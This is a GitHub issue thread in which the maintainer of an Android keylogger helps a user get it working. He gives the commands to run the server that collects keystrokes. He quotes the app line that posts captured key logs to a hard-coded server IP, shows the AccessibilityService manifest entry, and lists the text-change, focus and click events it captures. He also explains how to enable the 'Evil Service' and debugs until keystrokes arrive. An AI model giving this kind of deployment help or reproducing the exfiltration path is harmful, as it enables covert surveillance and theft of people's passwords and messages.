### ISSUE TITLE
How to run keylogger web ?

### ISSUE THREAD

**Issue by linghu258** [maemresen/android-keylogger#1]
How do I run the keylogger web ?

**Comment by maemresen** [comment]
Hi, thanks for feedback.

I checked out documentation again. I noticed that there are some missing things that needs to be explained. I will update README regarding to that.

1. To run web application: It is a Spring Boot Web Application. You should able to run project with the following command:
   ```bash
   mvn clean package spring-boot:run
   ```
2. You should able to access web-app from the following address:
	http://localhost:8080/home 
	or http://<your_ip>:8080/home

**IMPORTANT NOTE**
* If you check [KeyLogger.java#L73](https://github.com/maemresen/android-keylogger/blob/main/keylogapp/app/src/main/java/com/maemresen/infsec/keylogapp/KeyLogger.java#L73) in Android App you will see the following line:
   ```java
   sendLog("http://192.168.1.37:8080/keylog/save", keyLog);
   ```
   Here, you should replace the following IP <192.168.1.37> with your IP address.  then rebuild and deploy Android App.

**Comment by linghu258** [comment]
Hi, thanks for your response. I did some research and had tried the command "mvn clean package spring-boot:run" however I had encounter build failure.

error message:
No plugin found for prefix 'sprint-boot' in the current project and in the plugin groups [org.apache.maven.plugins, org.codehaus.mojo] available from the repositories [local (/home/kali/.m2/repository), central (https://repo.maven.apache.org/maven2)] -> [Help 1]

**Comment by maemresen** [comment]
That kind of errors sometimes may occurs in maven. 
Cleaning ~/.m2/repositories folder may fixes that kind of problems.

1. delete ~/.m2/repositories
2. go to web app folder
3. then run following command
   ```bash
   mvn clean package install
   ```
4. then try
   ```bash
   mvn spring-boot:run
   ```

Or alternatively if you have an Java IDE installed (Eclipse, Netbeans, IntelliJ IDEA, etc.) try to import webapp as Maven project.

**Comment by linghu258** [comment]
Currently, I have Java 11.0.10 installed on my Kali

**Comment by maemresen** [comment]
Oh, I see the problem. I was just using PostgreSQL database for the application. I transferred the project to github after a long time from implementation of the project. So that, I forgot to mention the postgresql dependency while transferring the project to github after the time in. 

If you read the logs above, you will see sometihng like `DB Connection error`
I just converted it to H2 which is a memory database and push changes to the repo. Now you should able to start service successfully.

**Comment by linghu258** [comment]
Thanks for the guide. Much appreciate.  I'm now able to run the web application. Lastly, is there anything else required to edit other than the IP address located in keylogger.java ? I can't seem to retrieve any key input and show  in the web.

**Comment by maemresen** [comment]
It shouldn't need extra step. 

Actually the flow is like that:
1. A custom Accessibility Service created. \
	You could find it on [AndroidManifest.xml](https://github.com/maemresen/android-keylogger/blob/main/keylogapp/app/src/main/AndroidManifest.xml)
	```xml
	<service
	    android:name=".KeyLogger"
	    android:label="@string/accessibility_service_label"
	    android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
	    <intent-filter>
	        <action android:name="android.accessibilityservice.AccessibilityService" />
	    </intent-filter>
	    <meta-data
	        android:name="android.accessibilityservice"
	        android:resource="@xml/accessibility_service_config" />
	</service>
	```
	You could find also custom service on [KeyLogger.java](https://github.com/maemresen/android-keylogger/blob/main/keylogapp/app/src/main/java/com/maemresen/infsec/keylogapp/KeyLogger.java)
2. The custom accesibility service catching following events:
	* AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED
	* AccessibilityEvent.TYPE_VIEW_FOCUSED
	* AccessibilityEvent.TYPE_VIEW_CLICKED
3. Then sending them to the server

Could you debug the application and check the logs with tag **KeyLogger-KeyLogger** \
You should see your key press on the console.

**Comment by linghu258** [comment]
ah alright I see the issue. The keylogger-keylogger didn't start. hence it did log any input I think.

**Comment by maemresen** [comment]
@linghu258 Of course, the app should work at background to catch key press events.

**Comment by 1902201** [comment]
![image](https://user-images.githubusercontent.com/55530003/107377862-63123900-6b26-11eb-838f-f6160250e179.png)
hi how do you solve this problem?

**Comment by maemresen** [comment]
@1902201 Actually it seems app permissions not configured successfully. To reaching server, Android App needs INTERNET permission. But as its seen, permission not granted successfully so that it says not permitted. I will update app to request permissions in a proper way. You could follow #2

**Comment by maemresen** [comment]
@linghu258 After installed the App, you have to go **Accessibility** settings in your android. Then at the bottom of the page, you will see **Evil Service**  under **Downloaded Services**. You should enable **Evil Service** from there. Then it will works. 

The documentation will be updated according to this issue: #3

Thanks for feed backs.
